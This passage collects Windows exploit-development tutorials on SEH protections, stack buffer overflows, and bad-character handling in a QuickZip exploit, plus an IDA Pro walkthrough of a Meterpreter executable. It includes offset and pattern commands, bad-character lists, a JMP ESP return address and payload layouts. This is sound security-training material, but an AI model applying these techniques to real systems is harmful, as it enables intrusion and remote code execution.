specifically: SafeSEH and SEHOP. This section will only familiarize you with the most basic
concepts of these protections so I encourage you to research more on the topics.
SafeSEH
Windows XP SP2 introduced the SafeSEH protection mechanism in which validated exception
handlers are registered and stored in a table. The addresses in this table are checked prior to
executing a given exception handler to ensure it is deemed “safe”. As a result, a POP+POP+RET
address used to overwrite an SEH record that comes from a module compiled with SafeSEH
will not appear in the table and the SEH exploit will fail.
SafeSEH is effective at preventing SEH-based exploits as long as the SEH overwrite address (e.g.
POP+POP+RET) comes from a module compiled with SafeSEH. The good news (from an
exploitability perspective) is that application modules are not typically compiled with SafeSEH
by default. Even if most are, any module loaded by an application that was not compiled with
SafeSEH can be used for your SEH overwrite. You can easily find such modules with mona:
Alternatively, you can use the !mona SEH command which will only look in modules compiled
without SafeSEH by default.
The key with bypassing SafeSEH is to find a module that was not compiled with the option.
As previously stated, one of the downsides of SafeSEH is that it required changing and
rebuilding/compiling executables. Rather than require code changes, SEHOP works at run time
and verifies that a thread’s exception handler chain is intact (can be navigated from top to
bottom) before calling an exception handler. As a result, overwriting the SEH address would
break the chain and trigger SEHOP, rendering the SEH exploit attempt ineffective. SEHOP does
this by adding a custom record to the end of the SEH chain. Prior to executing an exception
handler, the OS ensures this custom record can be reached by walking the chain from top to
bottom.
SEHOP was introduced in Windows Vista SP1 and is available on subsequent desktop and
servers versions. It is enabled by default on Windows Server Editions (from 2008 on) and
disabled by default on desktop versions. EMET also provides SEHOP protection.
Additional Resources
If you’re interested in researching more on the topic of SEH check out some of these
resources:
• A Crash Course on the Depths of Win32™ Structured Exception Handling (Matt Pietrek)
• SEH Stack Based Windows Buffer Overflow Tutorial (The Grey Corner)
• The Need for a POP POP RET Instruction Sequence (Dimitrios Kalemis)
Conclusion
It’s my hope that this tutorial (and the referenced resources) provided a basic understanding
of how Microsoft implements exception handling and how SEH can be leveraged for exploit
development. As always, I’m interested in feedback — you can leave in the comments section,
on Twitter, or both. Stay tuned for the next installment in the series on Unicode-based
exploits.
• Make a simple script to shove a bunch of garbage into an input field and crash the
program
• Find the exact number of characters required to reach the EIP (instruction pointer)
• Inspect the program's .dll files to find one without memory protections
• Once you've found a suitable .dll, search for a JMP ESP (jump to the stack pointer)
command
Make shellcode
• Find the 'bad' characters that will prevent your exploit from working
• Update your simple script to hit the EIP, jump to the ESP and execute your shellcode
If you haven't done this before, many of the terms above will be unfamiliar, but don't worry.
You can do simple buffer overflows without knowing much about Assembly or memory layout,
and you'll learn a lot along the way. I spent far too much time reading about those things and
freaking myself out. All you need to get started is in the video below.
Bad Characters
A bad character is simply a list of unwanted characters that can break the shell codes. There is
no universal set of bad characters, as we would probably be beginning to understand, but
depending on the application and the developer logic there is a different set of bad characters
for every program that we would encounter. Therefore, we will have to find out the bad
characters in every application before writing the shell code. Some of the very common bad
characters are:
• 00 for NULL
So, now let’s run the server program normally on the machine A.
Figure: 1
As can be seen in the above screenshot, the server program is perfectly running on Machine A,
and in our case the IP address of the machine is 192.168.1.173 (It could be changed according
to the network configuration). This server program would wait on port no 10000 for incoming
connection.
Now, we will connect to the server program by the machine B. We will be using NetCut tool on
machine B to connect to the server program that is running on machine A. This is the same
tool that we used in the previous articles.
After connecting to the server program, we can see whatever we are typing on the machine B
is getting reflected back to the B machine, so this is the functionality of the server program.
We can see the same in following screenshot.
Figure: 2
Now, everything is ready. So, we will proceed to write the exploit. The steps to write the
exploit are given below.
Let’s open the Python script which we have already used in the previous articles, and change
the port no 9000 to 10000 as the program has different port to listen and enter 500 A’s as
input into the program. We can do it by editing the input = “A”*500. We can see the same
Python script in the below screen shot.
Figure: 3
As can be seen in the screen shot that we have changed the Port No to 10000 and also
assigned 500 A’s in the input variable. Once the Python script would run it would send A to the
server program.
(Note: As of now, this is the simple Python script, which can be seen in the above screen shot
but later on, we would be developing the exploit by editing this script as we had done in
previous article.)
Now, save the Python script and run the program on machine B. We can see the same in the
screenshot given below.
Figure: 4
It can be seen in the following screenshot that our server program has crashed and when we
click on “click here,” we can see that offset is overwritten by 41414141, which is the A’s in
Hexadecimal.
Figure: 5
This is enough to confirm that this program is vulnerable for buffer overflow.
Now, we will have to identify the exact position at which the EIP register is overwritten by the
user input. We can do it by inserting the pattern as input. (We have already done the same in
the previous articles, so we are not going to discuss it here in detail.) Now, generate the
pattern of 500 bytes and replace it with the A’s in the Python script. We can see the same in
following screenshot.
• /usr/share/metasploit-framework/tools/pattern_create.rb 500
Figure: 6
As can be seen in the above screenshot, we have successfully added the created pattern in the
Python script now save the Python script and open and run the server program with the
debugger (In machine A), after that we run the Python script on machine B.
Figure: 7
As can be seen in the above screenshot that the program is again crashed, but when we closely
look into the debugger (Machine A) we can see the following information.
Figure: 8
In the above screen shot, we see that EIP is overwritten with the value 6A413969 and Top of
Stack is holding the value 316A4130. Now, we will run the following command to get the exact
location of the overwritten part.
• /usr/share/metasploit-framework/tools/pattern_offset.rb 6a413969
• /usr/share/metasploit-framework/tools/pattern_offset.rb 316a4130
Figure: 9
Now, we got the exact location where the user input is overwritten in the memory.
Now, we will write four B’s after the 268-byte data so that our scenario would be clear. We can
do it by making the following changes in the Python script.
Figure: 10
As seen in the above screenshot that, at First, we have added 268 A’s and after that we have
added four B’s and in the end we have added some C’s in the input. Later on, we will replace
B’s with the some other memory address in the script and C will be replaced by our shell code.
Now, let’s restart the debugger by hitting CTRL+F2 in the machine A and run the Python script
again.
Figure: 11
As can be seen in the above screen shot, after running the changed Python script EIP is
overwritten with 42424242 and the rest of the stack is holding the value 43434343 in which 42
represents B’s in hexadecimal and 43 represents C’s in hexadecimal.
As we have already defined earlier in this article that any unwanted characters that can break
the shell code are considered to be as bad characters in the world of exploitation. So let’s find
out whether this application has any bad characters or not. The steps to identifying the bad
characters are given below.
• Send the full list of the characters from 0x00 to 0xFF as input into the program.
• Remove the character from the list and go back to first step again.
• If input no longer breaks, the rest of the characters could be used to generate the shell
code.
First, we will have to generate all the characters that can be used to generate the shell code.
We can do it by writing our own code that generates the list of all characters. Following is the
code that is written in C language that will generate the list of all the characters.
Figure: 12
We can see the source code of badchar.c in the above screenshot, after that we have compiled
it by the gcc compiler and finally when we run the output file it generates and prints the list of
bad characters.
Now, we copy all the characters and add it into the Python file as input after the B’s.
Figure: 13
As can be seen in the above screenshot that we have appended the character list in the Python
script which we generated by running the C program. Now, after saving the Python script,
restart the debugger and re-run the Python script.
Figure: 14
Now, we can see in the above screenshot that program is again crashed and if we closely look
into the stack we can see that EIP is overwritten with 42424242 which is B(in hexadecimal) but
after that we can see some random numbers in the stack instead of our character list. We can
see the same in the following screenshot.
Figure: 15
Therefore, it may be possible that our first character in the list might be the bad character. So,
we remove the first character in the Python on machine B. We can see this in the screenshot
given below.
Figure: 16
It can be seen in the above screenshot that the first character was x00 and we have removed it
from the Python script. Now, we will restart the debugger in machine A and run the program
again.
Figure: 17
After running the Python script, we can see that the program is again crashed but when we
closely look into the stack, we see the same character list in the stack, which we have entered
into the Python script and if we scroll down the stack tab, we also see our C’s in the stack. We
can verity the same by checking the Hex dump.
Figure: 18
It confirms us that we have only one bad character, which is “x00” (NULL). In simple words, we
can say, we cannot use “x00” anywhere in the user input as it is identified as a bad character.
As we have identified the bad character in the application now we will remove the character
list from the Python script. After removing the character list our Python script will look like
this.
Figure: 19
In this section, we will shift the program execution control to a different position, which could
be the address where the shell code is stored in the memory by modifying the EIP value.
In this article, we have already replaced the EIP value with the BBBB. Let’s run the Python
script again and we get following output on the screen of machine A.
Figure: 20
In previous article we have replaced the B’s with the next instruction address to shift the
execution control to the next instruction, but we cannot do the same in this situation as the
next instruction address has the 00 in it and 00 is the bad character in this program which we
have identified in previous step. So, we will have to use some different approach to write the
address.
Now, if we closely look into the Register section in the above screenshot we can see that ESP is
the register name, which is holding the C’s in the stack. So, imagine if BBBB contains the
address of an instruction in the memory, which is JMP ESP, so, what will happen is we would
jump to that instruction and as it says JMP ESP, so, we will jump right back to the C’s as ESP is
holding the C’s. So, this technique is called the JMP ESP technique. Later on, we will replace
the C’s with the Shell Code in the below of the article.
Let’s implement this technique and find the JMP ESP instruction in the program. So restart the
program in the debugger and Press ALT+E. It will open another screen and show DLL’s which
are being used in the program. We can see the same in the screenshot given below.
Figure: 21
Now, open any DLL and search for the JMP ESP instruction that does not have the Null Byte in
the address. In our case we will use “ntdll.dll,” let’s open it by clicking on it and we will see the
following screen.
Figure: 22
Press CTRL+F, the Find Command box will open. Now enter the “JMP ESP” in the search box
and hit enter key. After that, we can see the following screen.
Figure: 23
As we can see in the above screenshot, that JMP ESP instruction is highlighted and we can also
see the corresponding address on the left hand side. This is the address with which we will
have to replace the B’s in the Python script. Let’s write this address in the Python script in
reverse order the address would be.
“xedx1ex94x7c”
Now, replace it in the Python script with B’s and create a break point here to verify the same in
details. We can create the breakpoint by pressing the F2 key.
After doing the changes in the Python script, the script will look like this.
Figure: 24
Now, we run the Python script again with the changes and following would be the output.
Figure: 25
As can be seen in the above screenshot that the server did not crash this time it actually
paused where we had created the breakpoint and we can also see our A’s, JMP ESP address
and C’s in the stack. Everything is looking perfect right now. Now, hit the F7 key which is Step
Into.
Figure: 26
As can be seen in the above screenshot, our JMP instruction was successfully executed and EIP
is pointing to the next instruction. Now, we will replace C’s with the shell code.
Now, generate the shell code with the help of msfvenem. Msfvenem also gives us the flexibility
to exclude the bad character. Following is command to generate the shell code.
After running the command, we can see that the shell code is successfully generated and when
we closely look into the shell code, we can see that it does not contain any x00 value in the
code.
Figure: 27
As can be seen in the above screen shot that our Reverse TCP shell code is generate. Now,
before appending the shell code into the Python script we will have to add additional
instruction into the Python script. The instruction that we are going to add into the script is
called the NOP Sled.
The meaning of NOP Sled is no operation it means when the NOP sled is encountered in the
program the CPU do not perform any actions and pass the execution control to the next
instruction. The NOP Sled is defined by “x90” So let’s add 20 NOP Sled into the Python script
before appending the shell code. After doing the changes the script will look like this.
Figure: 28
As can be seen in the above screenshot that we have appended the NOP Sled and shell code in
the Python script, now we save this script, restart the program in the debugger, and run the
Python script again.
Figure: 29
The program has again paused in the debugger as we have created the break point to the JMP
instruction and we can see that EIP and ESP is overwritten with the values which we have given
in the Python script. If we closely look into the debugger, we can see everything we have
appended in the Python script has successfully reached into the stack as we can see JMP
Instruction Address, NOP Sled and the shell code.
Now Hit the F9 to continue the program and we can see the program does not crash as per the
previous cases. This would be a great news for us.
The shell code we have inserted by the user input is executing in the computer memory. That
is the reason program does not crash. So, now let’s try to connect with NetCut on 4444 port by
the machine B.
Figure: 30
As can be seen in the above screen shot that we successfully got the reverse connection in the
machine B. Now we could verify the same by running the server program without the
debugger.
https://resources.infosecinstitute.com/topic/stack-based-buffer-overflow-in-win-32-platform-
part-6-dealing-with-bad-characters-jmp-instruction/
When you begin your journey in exploitation, you start with simple buffer overflows, then you
deal with SEH, play with egg hunters and so on. The process of exploitation is pretty
straightforward in this journey- sending a pretty large cyclic pattern, figuring out the offset
to EIP in order to control it, then passing the address to JMP ESP or POP POP RET or other
gadgets which ultimately will execute our shellcode.
However, perhaps the most undervalued step in this journey would have been finding bad
characters. And I understand why. Most of the time the bad characters situation is easily dealt
with using an encoder. But what if the number of bad characters is greater than good ones?
That’s when things get tricky. Suddenly this seemingly insignificant step becomes a huge pain
and affects every other step of exploit development. QuickZip 4.60 was a similar kind of story
that is discussed in detail by corelanc0d3r here, which is also I’m about to do. BUT, the method
I’m about to use is slightly different (not claiming it to be better or worse, just different) than
the one (actually two) discussed there. So, let’s get started.
Before I begin, the environment I’m going to use will be a Windows Vista x86, the original
article was written for Windows XP SP3 environment so you might notice some differences in
the offsets and addresses.
The crash!
I will jump straight to the PoC code that I copied from the article in order to replicate the
crash.
This PoC will create an exploit.zip file which needs to be opened using QuickZip. Double-
clicking on the filename will result in the crash.
The crash
Interestingly, the crash doesn’t look exploitable, there’s no cyclic pattern in EIP or SEH chain.
SEH chain
But if we pass the exception using Shift + F9, we can observe the SEH chain pops up with the
pattern.
The offset
Alright. From the address 396A4138, we can deduce the offset of 296 bytes. Let’s confirm it
first. We’ll modify the payload a bit:
We’ll recreate the malicious ZIP file and get a crash like this which confirms our offsets.
Confirming offset
Now comes the brutal part. Finding the bad characters. Mona.py from corelanc0d3r will help
us a lot here. Since we are putting our payload in filename, we can do some guess work to
predict some bad characters. Characters like / \ : should be in bad char list. But let me
demonstrate a simple procedure which uses mona.py to ease out the process of finding bad
characters.
To find bad characters, we will send an array of all possible characters as part of the payload.
Then we’ll use mona.py to compare the array with the memory.
To create the array, you can use !mona bytearray command. This will print the array in
Immunity Debugger’s log, and also create files bytearray.txt and bytearray.bin. You can copy
the array from the bytearray.txt file, the bytearray.bin file will be used in comparison later.
Generating bytearray
For a quick reference, these oneliners can also be used to generate the array:
Python
for i in range(0,256): print('\\x%02X' % i, end='')Bash
for i in {0..255}; do printf "\\\x%02x" $i;done
We’ll modify our PoC code to generate the ZIP file with our bytearray. After modification, our
code should look something like this:
We’ll run the generated ZIP through QuickZip and see what happens.
Truncation after NULL
Right off we see that the \x00 is causing problems. Let’s recreate the ZIP after removing it and
repeat the process.
Woah! What just happened? Looking at Immunity, we do see few registers pointing at our
payload. Following it on dump shows some interesting things. \x0F ,\x14, \x15 and \x2F are
mangled and everything after \x3A is truncated. It makes sense though, \x3A is colon (:)
character, a filename containing colon is expected to have everything after it truncated.
Mangled bytearray in memory
But visually identifying mangled characters is pain and it leaves a lot of room for errors. I
mean, I missed \x14 and \x15 myself. That’s why we’d like an automated way to find these
differences and mona will help us here. Just pass the following command to mona:
We can see how beautifully mona helps us with the bad chars. We’ll repeat this process after
removing bad chars. This time our payload is being treated as a folder instead of file:
Payload as folder
If we closely look at the error message, we can figure out the error happened
around \ character which also makes sense and explains why our payload was being treated as
a folder. We’ll remove \ or \x5C from our array and try again. This time we’ll get a clean crash.
A quick look at the comparison and WHAT A HORROR STORY WE HAVE!
Every character after \x80 is mangled! Not missing, it’s mangled! It’s different from the crash
we had with \x3A, the contents got truncated after that character. Here every character is
getting converted to something, every character after \x80 is bad! The final list of bad chars is:
Bad chars:
\x00\x0F\x14\x15\x2F\x3A\x5C\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8
D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\x
A2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB
6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\
xCB\xCC\xCD\xCE\xCF\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE
\xDF\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0\xF1\xF2\xF3\
xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF
Now that we have more than half of all characters as bad, let’s figure out how can we proceed
further.
The first step in SEH exploitation is to find a suitable POP POP RET address. Looking at the
loaded modules, we can only find the QuickZip.exe itself without SafeSEH.
The base address of that module doesn’t look very promising though, we immediately face a
pretty big challenge. All the addresses from this module will have a NULL byte at the
beginning. But let’s ignore it for now and pick one that doesn’t have other bad characters. One
such address is 0x00407A33. Let’s verify if this address is really working. We’ll modify our
payload to something like this:
Recreate the ZIP. Open it with QuickZip. Double click on filename. And we
have 0x00407A33 listed in SEH chain.
Let’s set a breakpoint at 0x00407A33 and verify POP POP RET too.
Verifying POP POP RET
Perfect! Sad thing to notice here is that all our Ds are truncated.
Now that we have a working POP POP RET, how do we jump? Our good old \xEB is among bad
chars. Plus, we’ll have to perform a negative jump as everything after the address is truncated,
the only place left for shellcode is the starting 296 bytes. And negative jump means using a
value from \x80 to \xFF, all of them are bad chars.
We can resolve the JMP issue by using any of the conditional jumps. Instead of me explaining
it, you can go to this article by corelanc0d3r, there’s a table at the bottom listing all the
conditional jumps and their opcodes.
This is where my method starts to differ from method used by corelanc0d3r. We notice that
almost every bad char is getting mangled to another character. The trick here is to leverage
this conversion to un-bad the bad characters. Let’s look at the mangled bytearray again.
Mangled bytearray
We can notice here that \x87 is getting mangled to \xE7. So, if we want \xE7 in our shellcode,
we’d use \x87 instead and QuickZip will convert it to \xE7 for us. And wait a minute, we
have \xEB among possibly-good chars too, we can use it instead, no need for conditional
jumps!
Let’s test this theory and perform a negative jump. We will use \x89\xF6 which should give
us \xEB\xF7 in memory, and it translates to JMP 0xF7 or ‘Jump back 7 characters’ (remember,
offset is counted considering the length of JMP instruction itself). We’ll modify our payload to
look something like:
Our JMP should take us at the beginning of Bs. Let’s see what happens.
JMP 0xF7
Excellent! We can see we can our JMP instruction and the resulting jump here. Our theory is
working properly and we’ll be using it extensively in future.
Using our theory, we can quickly eliminate many possibly-good chars from bad char list. Our
list effectively becomes:
Bad chars:
\x00\x0F\x14\x15\x2F\x3A\x5C\x80\x81\x82\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8
E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA4\xA7\xA8\xA9\x
AD\xAE\xB3\xB4\xB6\xB8\xB9\xBE\xC0\xC1\xC2\xC3\xC8\xCA\xCB\xCC\xCD\xCE\xCF\xD0\xD
2\xD3\xD4\xD5\xD7\xD8\xD9\xDA\xDB\xDD\xDE\xE3\xF0\xF5\xF8\xFD\xFE
Not as huge as before, but still a lot! At least enough to keep troubling us.
So, we have a way to perform negative jumps now, but that still leaves us with only 296 bytes
to execute our shellcode, that too without considering the jumps we’ll need. With the tight
restrictions we have, standard shellcodes like bind or reverse shell would be very difficult to
write. The encoders can help us, yes, but with so many bad chars, none of them would
succeed. The best bet is using Alpha2 encoder. After using BufferRegister to get pure
alphanumeric shellcode (more on it here), the size of the payload becomes 710 bytes!
When we face issues with size of payload, the thing that immediately pops in our mind is an
egghunter (huge props to Skape)! Encoding the egg hunter, we see:
This looks much better. But the question is- where will we put the shellcode? It’s time to step
back a bit and think, are the Ds really getting truncated? If the application is loading the ZIP,
the whole, unaltered ZIP may be there somewhere in memory. Let’s find it out.
Finding Ds
A quick search reveals the Ds indeed are there in memory. However, none of the registers are
pointing to this address, nor it is there in stack. That’s OK, egghunter was small enough to fit at
the beginning of payload, we can use that. With an egghunter in place, our payload would look
something like this:
payload =
"A"*n + egghunter + "JMP[egghunter]" + POPPOPRET + [Egg + Shellcode]
While encoding our egghunter, we have to provide a BufferRegister otherwise the shellcode
will contain bad chars. We provided a BufferRegister of EAX. That means the shellcode
assumes it has address of itself stored in EAX register. How will we store the address of
shellcode in EAX? This is where a CALL instruction would help us.
A CALL instruction pushes the next address in stack and jumps to the provided offset. We can
then POP the address from stack into EAX. CALL instruction takes an offset of 4 bytes. If we
have a positive offset the first 3 bytes would be \x00, not desirable. So, a negative offset
makes sense since \xFF is not a bad char. We are looking at something like this:
Time for some maths. A CALL instruction will take 5 bytes. Egghunter is 118
bytes. JMP instruction itself is 2 bytes. So, we need an offset of 125 bytes or 7D bytes. This
translates to an offset of \x83. Good news is that \x83 is not a bad char.
Now, POP EAX takes 1 byte. JMP will take 2 bytes. So, any offset of 3 bytes or above will work.
We have \xF7 available to us.
Final piece in the puzzle is our shellcode. We can encode the shellcode with same Alpha2
encoder. This time we will use EDI as BufferRegister, egghunter will already have the address
stored in this register. You can use other encoders as well, since bad chars wouldn’t matter for
shellcode. But you still need to consider \ / : as bad chars as these characters have special
meaning for filenames.
I encourage you to rewrite the whole exploit with your own ideas. Corelanc0d3r’s article also
encourages you to think and think hard. Try random stuff, break things. If you found a different
method to exploit this then please share with us. Remember to always try harder!
https://medium.com/@notsoshant/windows-exploitation-dealing-with-bad-characters-
quickzip-exploit-472db5251ca6
https://www.bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-
py/
IDA Pro
IDA Pro is the best disassembler in the business. Although it costs a lot, there’s still a free
version available. I downloaded IDA Pro 6.2 limited edition, which is free but only
supports disassembly of x86 and ARM programs. Otherwise, it supports a myriad of other
platforms, which we won’t need here.
When IDA Pro is first loaded, a dialog box will appear asking you to disassemble a new file, to
enter the program without loading any file, or to load the previously loaded file. This can be
seen below:
We’ll choose to disassemble a new file. We’ll select the reverse Meterpreter executable that
we previously created with Metasploit framework. We can also disable the “Display at startup”
checkbox in the bottom of the window presented on the picture above so that IDA Pro runs
only when we want to use it. I guess whenever we’ve been working on some file already, it’s
best to click on the Previous button to open one of the files we’ve been working on in the past.
Upon opening the executable, IDA Pro will automatically recognize the file format of the
executable: in our case, it is a PE Windows executable. It will also recognize the architecture
the executable was compiled against. This can be seen on the picture below, where the
Processor Type of “Intel 80×86 processors: metapc” is detected. The processor type specifies
the processor module that will be used to disassemble the executable. The processor modules
are located under IDA Pro’s procs directory; in my case, the following modules are available:
arm.ilx and pc.ilx. Usually, the executable architecture and processor type are recognized
successfully and we won’t need to change that in the presented window.
The list of file types generated from the list of potential file types is located in IDA Pro’s loaders
directory. IDA Pro will automatically present the file types that can be used to work with the
loaded file. Any file loader that can recognize the analyzed file will be presented and we will be
able to choose any of them. On my version of IDA Pro, the loaders directory contains the
following files: dbg.llx, elf.llx, macho.llx, pe.llx. In our case, it was the pe.llx that was able to
recognize the analyzed file and display itself as the “Portable executable for 80386” option.
After we click on the OK button, IDA Pro will load a file as if it was loaded by the operating
system itself.
Database files
Upon opening a new file to analyze with IDA Pro, it analyzes the whole executable file and
creates an.idb database archive. The .idb archive contains four files [1]:
All of these file formats are proprietary and can only be used in IDA. Once the .idb database
has been created for a specific executable, IDA won’t need to analyze the program again when
we load it later. Moreover, IDA doesn’t even require the executable anymore; we can now
work with just the .idb file. This is a useful feature that can be used to pass around .idb files to
other researchers without the malicious executable. Therefore, IDA can analyze the executable
without the actual executable, and with only the database archive file.
Anytime we’re trying to close the currently open.idb database (the currently analyzed
executable), IDA asks us if we would like to save changes to the disk. We can choose from the
following options:
• Don’t pack database: flush changes to .id0, id1, nam and til databases and don’t create
.idb file.
• Pack database (Store): archives the .id0, id1, nam and til into the .idb archive. Note
that the .idb of the previous session is overwritten.
• Pack database (Deflate): the same as the previous option, except the database files are
compressed in the .idb archive.
• Collect garbage: deletes any unused memory pages from the database. This can be
useful if we want to create a smaller database .idb file.
• Don’t save the database: we can pick this option if we don’t want to save the changes
that we have made.
If we are using the demo version of IDA, we won’t be able to save our work, since that function
is disabled. If we want to use that option, we can either download IDA Pro 5.0, which is free
but outdated, or pay for our own IDA Pro version.
If we saved our work, we can open the database anytime later on and it will load really fast,
because it doesn’t need to perform the whole analysis of the executable file like the first time.
This saves us time and money when analyzing malicious files.
We need to keep in mind that whenever IDA analyzes the executable, it must do quite a lot of
work, like parsing the executable’s header (in our case, a PE executable header), parsing and
creating sections for various executable’s file sections that it may have (.data, .code, etc),
identifying the entry point of the executable where the code will start executing if we run it,
etc.
During that time, IDA will also load and parse the actual code instructions of the executable file
into the assembly instructions of the selected processor module. Those assembly instructions
are then also showed to the user for analysis. But IDA doesn’t stop there; it can also scan the
generated assembly instructions to figure out additional information about the executable, like
the compiler which was used to compile the executable, the function’s arguments, the
function’s local variables, etc.
All in all, IDA can be incredibly helpful in analyzing an executable by providing various
information that we normally would have had to figure out ourselves.
We can see the menu area that contains the menu items File, Edit, etc. This can be used to do
anything that is possible to do with IDA; it’s just a matter of finding the right option we would
like to do. A shortcut for various actions is the toolbar area that provides shortcuts for the
same actions we could find in the Menu itself. We can add and remove toolbars by using the
View – Toolbars menu option. The next thing is an overview navigator, which is also presented
on the picture below for clarity:
It represents the whole memory space used by the analyzed application. If we right-click on it,
we can zoom in and out to represent smaller chunks of memory. We can also see that different
colors are used for different parts of the memory; this depends on the type of data or code
being loaded into that area. At the very beginning of the navigator, we can see a very small
yellow arrow that points to the location where we’re currently at in the disassembly window.
On the picture below, we’re presenting the different views on the gathered data. The data was
gathered on the initial analysis of the executable and now we’re merely asking IDA to return a
specific type of data in its own data view.
We can see that there are a lot of data views available and all of them contain one or more
specific information that was gathered from the loaded executable. To open a specific data
view, we can go to View – Open Subviews and choose the appropriate view we would like to
show. We can also switch back to the default view by clicking on Windows – Reset desktop.
The main view is the disassembly window where we can see the actual disassembled code of
the analyzed executable. We can switch between the graph and the listing view that actually
represents the same program. The graph view can be used if we want to quickly figure out the
execution flow of the current function and the listing view can be used when we want to see
the actual assembly instructions.
The graph overview of the Meterpreter executable is presented on the picture below:
This is just an overview of the program for easier navigation of the piece of code that we
would like to be analyzing. In the picture above, we clicked on the start of the program (note
the dotted rectangular square). But as it’s on the graph overview, we can’t see the actual code
that will get disassembled. There’s an additional window, the graph view window, which goes
together with the graph preview window where we can see the disassembled code presenting
the corresponding code as in the graph preview, shown on the picture below:
On the left side is a window presenting the actual disassembled code of the beginning of the
program. On the right, we can see the overview graph presenting the same beginning of the
program. On the graph overview, the program is broken down into logical blocks, where each
block is presenting a jump target (as defined in the assembly code). From the graph overview
we can also see the logic the program uses while executing. In our case, we can see that there
are no decision branches and the program is executed from start to finish without any
decisions. The arrows between the blocks can be green, red or blue. In our case, all of the
arrows are blue because there’s no branching being done. If the program is deciding
something at some point and there are two possible branches the execution can go into, we
will have a green arrow to note what is taken by default and a red arrow for what isn’t taken
by default. The graph overview always presents the whole current function of the program,
which makes it easy to go to a specific point in the program if the program is overly
complicated and the navigation in the listings view becomes difficult.
The listing view of the Meterpreter executable is presented on the picture below:
Let’s also present another listing window that has a little more going on than the one on the
picture above.
We can switch between different locations in listing view or within the graph view; both of the
views will represent the same code at any given time. If we look at the graph and the listings
view more carefully, we can see that the listings view also presents the virtual addresses
where certain instructions are located, while the graph view hides those. This is because the
graph view can be presented more clearly with less information, so virtual addresses are
hidden. Nevertheless, if we would like to show those addresses, we can enable them in
Options – General – Disassembly and enable the “Line prefixes” option. Those preferences can
be seen on the picture below:
On the left side of the listing window, we can see different arrows that show us the branching
in the analyzed program. On the line 0x0040134B, we can see the program will jump to the
location 0x00401337 and continue the execution from there.
The arrays are of different colors and can be solid or dashed. The solid lines represent
unconditional jumps, while the dashed lines represent conditional jumps. In our example, the
red line is solid, because the instruction located at that address uses the unconditional
instruction jmp.
IDA pro can also figure out the arguments of the function in question. We can’t see any
function parameters on the picture above but we can see the comments noted with a ‘;’ at the
end of some of the lines. Each of the comments lets us know that another instruction is
referencing that place in the code. In our case, we can see a cross-reference comment “; CODE
XREF: .text:0040134B”, which lets us know that the instruction at address 0x0040134B is
referencing the current address. So though we already know that the program is jumping from
location 0x0040134B to 0x00401337, we often won’t be able to tell so easily, which is why the
cross-references can be very helpful.
When viewing the instructions in graph mode afterwards, the virtual addresses will be
enabled. This can be seen on the picture below where we presented the same picture as
above, just with virtual addresses enabled:
In the IDA’s default window, there’s an additional window that is used to display different
messages generated by IDA. Those messages can be outputted by any kind of plugin in IDA or
by IDA itself. The messages are there to inform us of different things regarding the analysis of
the executable sample. For clarity, the message view is presented below:
Other views
If we go inside View – Open Subviews, we can see many windows that can be shown or hidden
and provide us with additional functionality. These can be seen on the picture below:
If we go inside the Windows menu option, we can see the currently open windows which we
can quickly bring to the front by using the Alt-Num shortcut, where Num is a number. The
currently open windows can be seen on the picture below with their appropriate shortcuts:
IDA View-A
We already presented IDA View-A, which is simply the code disassembly of the program.
Hex View-A
The hex view window presents the hex representation of the program. The first hex window is
always synchronized with the disassembly view, so it always presents the same virtual
addresses. If some bytes are highlighted in either one of the windows they are also highlighted
in the other window as well.
Let’s first select some text in the IDA View-A. On the picture below, we selected the text “Send
request failed!”:
The corresponding Hex View-A will have to have the same text selected as can be seen below:
If we right-click on the Hex View-A, we can also disable the synchronization of the hex view
with the disassembly view. That functionality can be seen on the picture below:
Exports
The Exports window lists the exported function that can be used by outside files. Exported
functions are most common in shared libraries as they provide the basic building block APIs
that can be used by programs running on the system to do basic operations. In our case, there
is only one export function named start, which is the executable’s entry point.
Imports
The Imports window lists all of the functions that the executable calls that are not contained in
the executable itself. This is a common scenario present when the executable is using shared
DLLs to do its job. The Meterpreter executable contains the following imported functions:
The imports window lists the virtual address of the function, its name, and the DLL to which it
belongs to.
We need to keep in mind that the imports window will list only those shared functions that are
loaded by a dynamic loader at runtime, but the executable can load dynamic functions by itself
using a function call like LoadLibrary.
Names window
The names window displays all the names found within the executable program. A name is
simply an alias for a certain virtual address. Usually, each referenced location in the executable
will have a name. Referenced locations are named locations where we transfer the execution
at branch/call time and also the variables, where we read the data from or write the data to. If
there are symbols contained in the executable’s symbol table, they are appended to the list in
the Names window.
Throughout the disassembled code, we can also notice the names that do not appear in the
names window; those are automatically generated by IDA itself. This happens because the
symbol table in the executable doesn’t contain the relevant symbol, which could be inherited.
The automatically generated names usually have one of the following prefixes followed by
their corresponding virtual address: sub_, loc_, byte_, word_, dword_ and unk_.
We can use names to quickly jump to various locations inside the program executable without
having to remember their corresponding virtual addresses. The names window for the
Meterpreter executable can be seen on the picture below:
Let’s take a look at the start name that points to the 0x004012A7 virtual address location. Also,
take a look at the same memory location in the disassembly view; we can see that the start
name is indeed located at the specified location as can be seen on the picture below:
We also need to mention different colors and letters present in each line in the Names
window. Different letters mean the following [1]:
• L (Library): library function that can be recognized with different signatures that are
part of IDA. If the matching signature is not found, the name is labeled as a regular
function.
• I (Imported): imported name from the shared library. The code from this
function/name is not present in the executable and is provided at run time, whereas
the library function is embedded into the executable.
• C (Code): named code that represent program locations that are not part of any
function, which can happen if the name is a part of the symbol table, but the
executable never calls this function.
